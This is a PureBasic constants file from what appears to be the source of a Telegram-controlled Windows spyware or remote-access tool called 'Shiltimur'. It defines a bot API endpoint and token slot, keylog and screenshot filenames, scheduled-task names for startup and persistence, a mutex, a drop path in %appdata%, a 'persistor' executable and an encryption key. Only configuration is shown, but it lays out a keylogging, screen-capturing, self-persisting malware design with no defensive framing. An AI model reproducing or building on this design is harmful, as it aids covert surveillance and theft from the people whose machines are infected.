;constants include file
Global UPDATE_ID_FILE.s="updateId"
Global ROOT_URL.s="https://api.telegram.org/bot"
Global BOT_TOKEN.s="" ;this should be read off of resource
Global AUTHENTICATED_USER_ID.q=0 ;this should be read off of resource
Global SCREENSHOT_FILENAME.s="screenshot.jpeg"
Global KEYLOG_FILENAME.s="keylog.txt"
Global STARTUP_TASK_NAME.s="Shiltimur\Startup"
Global PERSIST_TASK_NAME.s="Shiltimur\Persistence"
Global MUTEX_NAME.s="Shiltimur_Mutex"
Global DROP_PATH.s="%appdata%" ;this should be read off of resource
Global DROP_EXENAME.s="shiltimur" ;this should be read off of resource
Global PERSISTOR_EXENAME.s="persistor"
Global ENCRYPTION_KEY.s="totallynotakey"
; IDE Options = PureBasic 5.70 LTS (Windows - x86)
; CursorPosition = 13
; EnableAsm
; EnableThread
; EnableXP
; EnablePurifier